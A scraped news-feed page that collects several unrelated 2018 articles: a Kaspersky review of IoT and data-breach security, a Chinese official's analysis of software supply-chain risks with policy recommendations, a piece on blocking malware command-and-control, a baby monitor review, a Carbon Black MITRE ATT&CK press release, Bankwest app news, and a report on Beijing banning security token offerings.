These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where lack of standardization leaves developers to ignore security, or consider it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack . A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities almost as many as it has features that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station . This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about ithere,here andhere). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advicehere.

This year, we also investigated smart devices for animals specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities . Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to man-in-the-middle (MitM) attacks―intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information for example, a credit card number or CVC code because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers .

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our reporthere, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats , and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security . The German government recently published its suggestions for minimum standards for broadband routers .

It’s also important that consumers consider security before buying any connected device.

Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface. Look online for information about any vulnerabilities that have been reported. Check to see if it’s possible to update the firmware on the device. Always change the default password and replace it with a unique, complex password. Don’t share serial numbers, IP addresses and other sensitive data relating to the device online. Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news these include Under Armour , FIFA , Adidas , Ticketmaster , T-Mobile , Reddit , British Airways and Cathay Pacific .

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices . Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook , for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach in particular, by using unique passwords for each site, and by using two-factor authentication.

公安部网络安全保卫局祝国邦:软件供应链安全现状与对策建议

$
0
0
纵深话题:软件供应链安全风险解析

随着互联网的迅猛发展,软件供应链安全事件近年来频繁发生。软件供应链安全具有威胁对象种类多、极端隐蔽、涉及纬度广、攻击成本低回报高、检测困难等特性。软件供应链中的任意环节遭受攻击,都会引起连锁反应,甚至威胁到国家网络安全。软件供应链其安全问题应该上升到基础设施安全的高度来对待,应该得到更多的、更广泛的重视。本专题围绕软件供应链,分析其所面临的主要安全风险和挑战,从各环节、多层面提出安全保障建议。

■ 公安部网络安全保卫局 祝国邦;四川省公安厅网络安全保卫总队 陈洁

近年来,随着网络安全形势的不断发展变化,世界范围内网络安全事件频发,大量网络攻击行为也滋生了以经济利益为目的的灰色产业链,对国家关键信息基础设施、重要业务信息系统以及公民个人信息安全造成极大损害。

一、披着“合法”外衣的恶意软件引关注

在严峻的网络安全大环境下,公安机关作为网络安全监管部门,在全国范围内组织开展了网络违法犯罪打击整治工作,从源头上对黑、灰产违法犯罪团伙进行打击,有效保障了国家网络安全。

在对近年来的网络攻击行为进行深入分析发现,恶意代码的传播和扩散占了很大比例, 尤其是披着“合法”外衣的恶意软件,使恶意代码在传播速度与影响面方面有了大幅提升,而常规基于特征识别,例如信息摘要算法(MD5)、关键字等的安全防护措施往往失效,给恶意代码的发现与防护带来了难度。

此类披着“合法”外衣的恶意软件,已经引起各国政府机构、互联网企业的关注,并对其产生的原因与途径进行了识别与定义,美国微软公司首先定义了该网络安全风险,称之为软件供应链安全(Software Supply Chain Attack)。目前,通过公安机关网络安全监测平台及国内互联网安全企业监测发现,这类披着“合法外衣”的恶意代码仍在我国蔓延,威胁国家网络安全。本文结合公安机关工作实际与软件供应链安全特性与关键环节,进行分析探讨,并提出意见建议。

二、软件供应链概念与现状 1. 软件供应链具有极强互联网特性

传统的制造业、食药供应等领域的供应链流程与标准已日趋完善,如商务部、财政部等国家部委发布的《关于2018年流通业现代供应链体系建设的通知》和《GB/T 4754-2017 2017年国民经济行业分类》等,都对传统供应链进行了充分的定义与规范。软件供应链是互联网迅猛发展的产物,具有极强“互联网特性”,但是,通过研究分析发现,其业务流程和关键因素的基本属性与传统供应链并没有太大变化,为方便大家理解,我们对一些关键环节进行了比对(如表所示)。


公安部网络安全保卫局祝国邦:软件供应链安全现状与对策建议
2. 软件供应链的三个关键流程

根据软件供应链的特点,软件供应链的业务流程可以抽象成开发、交付以及应用三个环节。在开发环节,主要是指软件开发商的编程人员根据用户(含定制用户)的需求,进行编程并完成软件包提供的过程。该过程主要涉及用户需求、编程语言、开发环境、开发框架、测试和封包等;在交付环节,主要是指开发商或者推广商通过互联网网站、在线商城、社交工具、在线网盘或者通过存储介质,将开发或定制的软件交付给最终用户;在应用环节,主要是指最终用户使用该软件产品,包括下载、安装、注册、付费、使用、故障修复、升级、卸载等全部过程。

3. 应用环节是软件供应链流向的重要维度

应用环节是充分了解软件供应链流向的一个重要维度,根据调研数据,从软件安装量维度看,约有75%的终端安装了办公软件,排名最高,其次是休闲娱乐软件,占比60%;从软件覆盖率维度看,网络安全软件的覆盖率高达80%,其次是休闲娱乐软件;从软件付费与免费维度看,付费的软件寥寥无几,免费的互联网软件多为用户自行下载安装的,软件的质量参差不齐,软件的来源也不清晰。

三、软件供应链风险分析

从近年来网络攻击事件的特点看,软件供应链安全主要是指:“修改软件或开发阶段的源码库、编码环境,植入恶意代码,在各类官方/非官方应用下载网站、网盘、通信工具以及硬件刻录光盘进行散布,诱导或捆绑进行下载,最终成功植入恶意代码”,这一系列的操作已不同于以往通过邮件钓鱼、链路劫持等手段,是整个软件供应链需要共同面对的问题。在抽象出软件供应链的关键环节后,可以做出假设,非法攻击者一旦对软件供应链中的任意环节进行攻击、篡改,都会引起最终软件供应链的连锁反应,直接危害国家网络安全。供应链环节可能遭受的风险如下:

1. 软件开发环节供应链风险

在软件开发阶段, 尚未有统一的、经过安全检验的发布渠道,多数工具未经检测直接发布;工具及库通常由商业公司或个人开发,因代码复杂,编程人员往往依据将易用性作为选择开发配套的唯一标准,缺乏安全的意识。因此,在开发阶段存在被病毒污染的可能,导致开发出的功能模块默认感染病毒,同时,在进行源代码打包或开发过程中,对功能模块进行后门留存,给程序的开发环境以及后续的使用环境,都带来了安全隐患。此外,程序开发环境一般属于核心区域,一旦编程人员下载了不安全的工具,则可能直接导致整体编程环境出现重大安全隐患,所有从该环境出入的代码,都可能存在泄密、篡改等风险。

在软件开发阶段,如果是自主开发,编程人员更为关注功能实现,往往会引用成熟、高效的开发框架,缺乏对安全的考量,如引用不安全函数、编程逻辑漏洞。在开发过程中,由于使用了不安全的工具与第三方库,间接导致病毒污染,也可能会有未知的后门留存,带来安全隐患。如果是外采购买,其面临的安全问题至少包含自主开发面临的所有问题,同时,外部厂商也会在提供模块过程中,携带新的供应风险。

在软件测试环节,进行源代码测试的工具如果存在恶意代码感染,则可能感染整体测试环境;测试人员不具备安全意识,测试电脑在不安全的环境进行操作,则带来次生感染;此外,进行源代码封包的工具也可能存在恶意代码感染。

2. 软件交付环节供应链风险

在发布渠道方面,目前,主流的软件发布渠道缺乏有效的监管,各应用发布商缺乏对软件发布的安全审核,同时,在网上也充斥着大量的个人发布渠道;从应用在上传至渠道用于下载的传输途径、存储、发布等环节,易发生多维度的篡改行为,导致渠道风险的发生;非官方发布平台直接发布或被篡改并植入恶意代码,造成感染。

在发布下载方面,软件厂商出于推广需要,多数软件往往会对自有软件进行捆绑安装,已形成了完整的灰色产业链,常见如第三方下载点、云服务、破解软件等下载安装时出现,都缺乏对捆绑软件的审核机制。同时,常见如域名劫持(DNS)、内容分发系统(CDN)缓存节点篡改等,导致用户在不知情的情况下,下载存在恶意代码或后门的软件。

3. 软件用户应用环节供应链风险

在安装方面,安装源自身可能存在隐患,安装时往往会配套一个脚本安装工具代为执行,但是,安装工具的出现无疑会增加整体使用供应链的安全;因为盗版软件的猖獗,终端用户往往会下载激活工具、注册机等,该类工具由于其非法性,往往来源存在问题。

在升级方面,升级包是对原软件进行升级的代码包,未经认证的升级包存在一定的安全风险;官方厂商以及第三方非认证组织往往会通过自身渠道进行补丁包发布,终端用户多数不会进行分辨,下载即安装。

在卸载方面,官方应用往往会将卸载工具内嵌至应用中,但是,对于部分应用由于其卸载不便,且容易残留,提供的第三方卸载工具,也会存在安全隐患。

四、国内外的相关应对举措

软件供应链安全是一个全球性问题,究其根本,是由于软件行业全球化、市场化、模块化的特点而生。2017年底,国家互联网应急中心(CNCERT)发布的《开源软件代码安全缺陷分析报告》,进一步印证了软件供应链―代码层面临的诸多问题。为应对软件供应链安全,国内外政府机关、企业已开始采取相关措施。

1.制定软件供应链标准、规范

美国政府颁布的《ICT供应链风险管理标准》(NIST SP800-161)、商用信息技术软件及固件审查项目(VET)等,清楚界定了软件供应链中涉及存储、检索、修改、传输以及服务的相关标准与要求,在一定程度上规避了软件供应链面临的诸多风险。

2.营造安全可靠的软件资源社区

不同于原软件资源共享平台Github仅负责资源的共享,而较少考虑源码的安全,国外互联网巨头,如杰蛙科技(JForg)、黑鸭软件(Black Duck)、Twistlock、容器安全(Aqua Security)等联合建设的开源项目Grafeas,清晰地将作者身份、代码记录、安全扫描结果等进行全过程展现。微软一直以来推崇的安全开发流程(SDL)等,都是将软件开发的整体流程,赋予其“链条化”,并对每个环节施加安全保障措施。

3.组织软件供应链攻防演练、竞赛

针对生产环境、开发环境、发布环境以及终端用户环境的“软件供应链”各阶段,开展攻防演练、竞赛,充分吸收容纳国内外科研院所、安全企业以及安全从业者的技术力量,逐步摸索出一套完整可行的软件供应链安全解决方案,如国内互联网企业阿里巴巴组织的“功守道”软件供应链安全大赛等,均取得了较好的效果与借鉴价值。

五、意见与建议

随着软件供应链给网络安全带来的安全风险,国家相关部门应切实采取有效措施,社会各界应广泛参与,共同营造网络清朗空间。有关意见建议如下:

1.国家网络安全监管部门

一是制定符合我国软件产业链的法律规范、标准体系。在《网络安全法》出台的背景下,在国家关键信息基础设施保护、网络安全等级保护等法规和行业主管部门规章的制定过程中,充分考虑软件供应链安全涉及的各方面,增加相应规范条款,在对软件供应链的各环节加以指导、约束。同时,出台或修订相关技术标准,规范软件供应链涉及的各环节。

二是加强软件供应链安全监管。网信、公安、工信等部门,应加强对软件供应链涉及的各个流程和关键环节的监管,建立体系化的监管机制和技术手段,加强软件安全审核和软件安全性检测,有效防范软件供应链安全威胁。

三是严厉打击软件供应链违法犯罪活动。公安机关进一步加强对网络攻击篡改、传播病毒木马、设置软件后门、窃取用户信息等软件供应链领域违法犯罪的打击力度,顺着软件供应链涉及的问题源码、传播途径(发布渠道)、感染目标等体系,全面摸排,依法打击查处。

四是协同国内各方力量“共治”。针对软件供应链风险这一社会广泛关注的问题,国内政府机关、科研院所、信息安全企业共同协同参与,从软件的开发、交付、应用等各环节加强安全防范。组织开展针对软件供应链的攻防演练,逐步固化、积累经验,培养信息安全的中坚力量。

2.国内科研院所和互联网企业

一是推动构建安全可靠的软件资源渠道。国内科研院所、大型互联网企业可依托自己的业界影响与技术实力,充分利用安全加密、数字签名等安全技术手段,加强审核、检测和防篡改等安全保护,为社会或行业构建安全可靠的软件资源共享渠道。

二是加强软件安全检测。国内科研院所、有关检测机构应加强软件安全检测,既包含软件自身缺陷、性能等方面的检测,也包括是否存在后门、漏洞等方面的检测。重点行业部门应加强对行业通用软件、定制软件的安全检测。加强检测技术和工具的研究和开发,提升我国软件安全检测能力和水平。

三是加强软件供应链风险共享和通报。加强软件供应链威胁情报信息共享与通报。国内科研院所、大型互联网企业等应将软件威胁和问题及时上报国家网络与信息安全信息通报机构或公安机关,以便相关部门准确评估相关风险的社会影响,从国家、社会等层面,全面解决问题。

3.软件用户

一是应选择安全可靠的软件资源下载渠道。虽然官方/高声誉的资源下载渠道同样面临严峻的软件供应链风险,但是,安全度相较自媒体的渠道明显更为可靠,出现问题也能够进行源头溯源。对于政府部门和企事业单位的业务区,应避免安装非必要的软件,确保软件源头安全。

二是严格把控资源升级、卸载等过程。资源的下载与安装的确是软件供应链突破的主要入口,但是,对于深度隐藏的“合法资源”来说,其往往会在后续发布的补丁、卸载脚本中,内嵌危险代码,用户更难以察觉,建议使用正版软件,避免使用盗版软件的注册机、激活工具。

三是提升安全防护能力。软件供应链风险是一个广泛的概念,在没有充分自主可控的情况下,应该提升攻击者的攻击成本与难度,及时有效发现资源、软件的异常活动行为,加强系统层面的安全防护。

(本文刊登于《中国信息安全》杂志2018年第11期)

声明:本文来自中国信息安全,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

Security Think Tank: Combine tech, process and people to block malware comms

$
0
0

Command and control (C&C) in the world of cyber attacks involves malware calling out to a central server under the attacker’s control to signal its presence. The server can remotely control this malware to initiate an attack, maintaining a communication link and sending execution instructions to compromised devices when desired.

The cyber kill chain (developed by Lockheed Martin) models the process that attackers go through to achieve their ultimate goal of data exfiltration or system compromise.

It comprises seven stages: reconnaissance; weaponisation; delivery; exploitation; installation; command and control; and actions on objectives. Malware is sent and installed on devices through stages 3, 4 and 5, while stage 6 sees attackers taking control of the malware and issuing instructions.

Some of today’s more sophisticated cyber attacks successfully compress the early stages (1 to 5), making stage 6 command and control easier to get to. Furthermore, attacks frequently involve multiple command-and-control servers, making it increasingly difficult for security analysts and automated systems to detect and respond to this stage of the chain.

Given that an attacker is so close to achieving their desired objective delivering stage 7 of the cyber kill chain it is imperative that they are stopped from accomplishing command and control in stage 6, the penultimate stage. Remembering that security is not a product, but an approach combining technology, process and people, addressing command and control should be considered in these buckets.

There is no single technology product to prevent an attacker getting through stage 6 of the cyber kill chain. Combinations of products are needed, and it is the combined picture that will help a security analyst spot that C&C is being attempted.

Examples of technology products include network monitoring and traffic analysis, network intrusion detection system (NIDS), threat intelligence platforms, honeypots , network intrusion prevention system (NIPS), and user and entity behaviour analytics (UEBA).

Process security controls can include ensuring that users, systems and devices only have access to what is required commonly referred to as “ least privilege ”. This can help limit what an attacker can do when they have obtained a user’s credentials during the cyber kill chain.

You should also look out for escalation of privileges. Consider investigating azero-trust approach, where a user is required to authenticate and be authorised for each application being used, rather than having blanket access from network log-in.

Furthermore, perform regular scanning of networks and systems this is a three-way security control (people and technology, as well as process) to pick up anomalies, such as sleeping malware.

Security analysts add a crucial layer of people to the technology and process security controls. For example, they will review alerts from automated systems, designed to pick up unusual or suspicious activity that might indicate malware calling out to a central server.

We are seeing increased levels of automation in security products and processes this is positive news, freeing up hard-pressed security analysts to investigate the highest priority alerts, including those that have progressed significantly through the cyber kill chain.

Focusing on stage 6 of the cyber kill chain recognises that sometimes stages 1 to 5 cannot or will not be addressed. This indicates that some organisations have moved beyond a tick-box methodology and are instead moving towards an approach to addressing overall cyber security and digital risk.

Eufy SpaceView Baby Monitor review: simple security for your small fry

$
0
0

While we love the futuristic capabilities of smart baby monitors, there is something to be said for simplicity. Mastering complicated tech is not something many anxious and sleep-deprived new parents want to tackle on top of learning to take care of a newborn. Eufy’s SpaceView Baby Monitor walks a welcome middle ground, blending just the right amount of forward-thinking features with a capable camera that’s easy to setup and operate.

Design

The Spaceview system consists of a single camera and an HD monitor, both of which feel a lot more substantial and durable than some other sets of this type. The camera has a built-in mic and speaker, can pan 330 degrees and tilt 110 degrees, and features 2x digital zoom. And in a unique twist, it comes with two separate lenses. A 62-degree pre-installed lens gives you a clear view of your baby within 6- to 10 feet of the camera. A second 110-degree lens can be attached to give you a wide-angle view of the child’s entire nursery.

The monitor has a 5-inch, 720p display. To the right of the display are a directional pad and buttons for activating the unit’s menu and push-to-talk feature. The unit is small enough to tote around with you and it has a coverage area of 460 feet, but a stand flips out from the back when you want to set it down on a nightstand or table.


Eufy SpaceView Baby Monitor review: simple security for your small fry
Eufy

A corner wall mount is included, so you can place the camera near your child's crib.

Setup and usage

The system is easy to set up, so you can quickly get eyes on your little one. First, you plug each unit into a power outlet using its supplied Micro-USB cable and adapter; you can untether the monitor once it’s fully charged, but the camera must stay plugged in. You then select “add a camera” from the monitor menu and press the pairing button on the back of the camera. I had the system running in less than a minute. The camera can freestand on any flat surface, but a corner wall mount comes with it, so you can get it right next to your baby’s crib.

The monitor provides a crystal-clear image in day or night-vision mode, even when fully zoomed. (There are three three preset zoom settings accessible from the menu, 1.5x, 2x, and Off.) Unlike a lot of VGA monitors, the image has no troublesome color cast, though it does tend to turn deep blues purple.

The image was equally crisp once I installed the wide-angle lens. This is done by simply screwing it on top of the embedded standard lens. The ability to change viewing angles makes it easy to keep close tabs on your sleeping infant, then go wide when they’re on the floor playing. It’s a smart idea and well-executed.


Eufy SpaceView Baby Monitor review: simple security for your small fry
Eufy

Two separate lenses let you focus on your child or get a view of the whole room.

The directional pad used to navigate the monitor’s menu is also used to pan and tilt the camera. The camera’s movements are smooth and true and stop the instant you depress the controls. The push-to-talk feature is also instantly responsive with clear sound, but I had to get right up to the monitor for it to register my voice.

Across the top of the image, the monitor displays the current temperature and sound level in the nursery. At night, you can enable sound-activated alerts, which let you set a sound threshold. This keeps the monitor in standby mode, turning the screen and speakers on only when that threshold is breached―and waking you with an insistent beeping―so you don’t need to keep an ear tuned to your child’s stirrings all night.

Bottom line

The SpaceView Baby Monitor is an excellent option for new parents. It has much better image quality than most of the handheld monitors we’ve reviewed, and the clever implementation of multiple lenses assures the camera grows with your child as they get more mobile. Best of all, it provides the features that are most likely to give you peace of mind without bogging you down in a lot of tech configuration.

If you need a baby monitor and aren’t quite ready for the type that works with your smartphone, put this one at the top of your shopping list.

This story, "Eufy SpaceView Baby Monitor review: simple security for your small fry" was originally published by TechHive .

Carbon Black Delivers MITRE ATT&CK Coverage with Zero Delayed Detections ...

$
0
0

ATT&CK assessment from the MITRE Corporation measured Cb Response’s effectiveness in detecting a range of adversary tactics and techniques

Carbon Black also adds MITRE ATT&CK threat intelligence feeds to Cb Response and Cb ThreatHunter to advance behaviour-based threat hunting across endpoints

READING, UK- 3rd December, 2018- Carbon Black (NASDAQ: CBLK), a leader in next-generation endpoint security delivered via the cloud, today announced that it delivered zero delayed detections and zero tainted detections in the MITRE Corporation’s Adversarial Tactics, Techniques and Common Knowledge ( ATT&CK ) assessment. The MITRE assessment tests the ability to quickly detect specific adversary tactics and techniques as captured in the ATT&CK knowledgebase.

The evaluations for this initial testing period used a MITRE-developed APT3 emulation plan on behaviour detection, telemetry and enrichment, among other elements. In the assessment, Cb Response demonstrated it could automatically detect and display adversarial behaviours without humans-in-the-loop across the entire MITRE ATT&CK Matrix, which includes: initial access, execution, privilege escalation, defence evasion, credential access, discovery, lateral movement, collection, exfiltration, and command and control.

For a look at the full report from MITRE on Carbon Black, click here: https://attackevals.mitre.org/evaluations/carbonblack.1.apt3.1.html .

“We’re proud to be among the initial vendors evaluated by MITRE and we’re extremely proud of these results. We attribute our very strong showing to our philosophy of building products the right way for the long haul,” said Scott Lundgren, Carbon Black’s Chief Technology Officer. “Objective, transparent and open testing is critical as a means of driving the industry forward, and the MITRE ATT&CK framework offers a critical look at how real-world attacks play out. We believe MITRE has set an excellent standard for how testing should be conducted in an open, rigorous, and sophisticated way. We thank MITRE for its leadership.”

“We’re very pleased with the participation in our first round of ATT&CK-based evaluations,” said Frank Duff, MITRE lead engineer for the evaluations program. “Effective cybersecurity can’t be done alone. We look forward to continued collaboration with the industry to help vendors understand their capabilities against known adversary behaviours and empower customers to more effectively buy and deploy these security solutions.”

MITRE ATT&CK Threat Intelligence Feeds for Cb Response & Cb ThreatHunter

In conjunction with the assessment results, Carbon Black announced it has added MITRE ATT&CK threat intelligence feeds to Cb Response and Cb ThreatHunter to deliver new behavior-based threat intelligence to customers.

Carbon Black’s MITRE ATT&CK feeds combine the power of Carbon Black’s unfiltered endpoint data collection and a robust collection of adversary techniques to simplify threat detection and threat hunting. The new threat feeds map directly to the various attack tactics outlined by MITRE.

“By adding ATT&CK threat intelligence feeds to Cb Response and Cb ThreatHunter, organisations now have an unfiltered view into all endpoint activity viewed through the lens of attack building blocks and behaviors noted by MITRE. We believe this results in more comprehensive and advanced threat hunting capabilities for security professionals,” said Lundgren. “The ATT&CK threat intelligence feeds directly integrate detection of ATT&CK tactics and techniques into the Cb Response and Cb ThreatHunter products, underscoring Carbon Black’s commitment to ATT&CK and other open standards and frameworks.”

_________

Tweet this: @CarbonBlack_Inc adds @MITREattack threat feeds to Cb Response and Cb ThreatHunter to advance behavior-based threat hunting across endpoints http://ow.ly/FEr230mOD07

Tweet this: @CarbonBlack_Inc delivers @MITREattack coverage with zero delayed detections & zero tainted detections http://ow.ly/FEr230mOD07

_________

Resources MITRE ATT&CK Assessment Results Carbon Black “Why I’m Ecstatic About the MITRE ATT&CK Results” Scott Lundgren Blog MITRE Resource Page on carbonblack.com Learn more about Cb ThreatHunter Learn more about Cb Response Using MITRE ATT&CK When Researching Attacker Behavior in a Post-Compromise World (Blog) Using the ATT&CK Framework to Mature Your Threat Hunting Program Follow @CarbonBlack_Inc on Twitter

About Carbon Black

Carbon Black (NASDAQ: CBLK) is a leading provider of next-generation endpoint security delivered via the cloud. Leveraging its big data and analytics cloud platform the Cb Predictive Security Cloud Carbon Black consolidates prevention, detection, response, threat hunting and managed services into a single platform with a single agent and single console, making it easier for organisations to consolidate security stacks and achieve better protection. As a cybersecurity innovator, Carbon Black has pioneered multiple endpoint security categories, including application control, endpoint detection and response (EDR), and next-generation antivirus (NGAV) enabling customers to defend against the most advanced threats. More than 4,600 global customers, including one-third of the Fortune 100, trust Carbon Black to keep their organisations safe.

Carbon Black and Cb Predictive Security Cloud are registered trademarks or trademarks of Carbon Black, In

Waiting for a new replacement credit card now alleviated says Bankwest

$
0
0

Bankwest, a division of the Commonwealth Bank, has launched its Digital Cards feature, allowing customers to activate a credit card via the bank’s mobile app prior to receiving the physical card.

Bankwest says the feature means if a customer orders a replacement or new card they can begin using their card within 24 hours, instead of having to wait up to seven business days to receive the card in the post.

At the same time Bankwest on Monday also released its new Secure Code Reset (SCR) feature in the Bankwest App.

SCR enables customers to reset their secure code from a compatible mobile device, which the bank says provides a self-service option to the more than 600 customers a day who currently have to contact its call centre or access online banking from a desktop computer to perform a code reset.

According to Bankwest, the developments have been made possible by its Agile operating model, “bringing together multi-disciplined colleagues to work iteratively to deliver value for customers”.

“The fast-paced way of working enabled Bankwest to develop its Cloud Native Platform, driving cloud-based apps and capabilities that resulted in record efficiencies for the Bank,” Bankwest says in its statement.

Pieter Vorster, Bankwest Executive General Manager Customer Solutions and Insights, said: “These developments are exciting for Bankwest and its customers.

“Our new ways of working through our Blaze agile model made it possible to roll out Digital Cards within an hour at an event in front of a live audience it previously took months.

“Our vision is to deliver amazing customer experiences that matter and Secure Code Reset is another step enabling customers to do their banking in a time that suits them.

“To see our colleagues producing innovations and tangible benefits in record time for customers is very pleasing and we look forward to continuing that delivery.”

47 REASONS TO ATTEND YOW! 2018

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

YOW! 2018 is a great place to network with the best and brightest software developers in Australia. You’ll
be amazed by the great ideas (and perhaps great talent) you’ll take back to the office!

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!


Security token offerings are illegal in Beijing, finance watchdog says

$
0
0

China hasremained vigilant toward the fledgling blockchain and cryptocurrency industry for a while and things might be about to get even worse. Beijing has declared security token offerings (STOs) illegal.

At a wealth management forum held over the weekend, Huo Xuewen, chief of Beijing’s Municipal Bureau of Finance, said that raising funds in STOs is practically “illegal,” local outlet Caijing reports ( via CoinDesk) .

“The ICO (initial coin offering) model is getting left behind for a new concept called STO. I want to issue a warning to anyone considering running an STO in Beijing,” Xuewen said. “Don’t do it in Beijing it is illegal. You can only engage in such activities with the approval from the government.”

For those unfamiliar: unlike anICOwhere a company raises funds by selling tokens to the public, an STO gives holders the ability to share the profits of a company through dividends.

Blockchain startups leaving ICOs for STOs

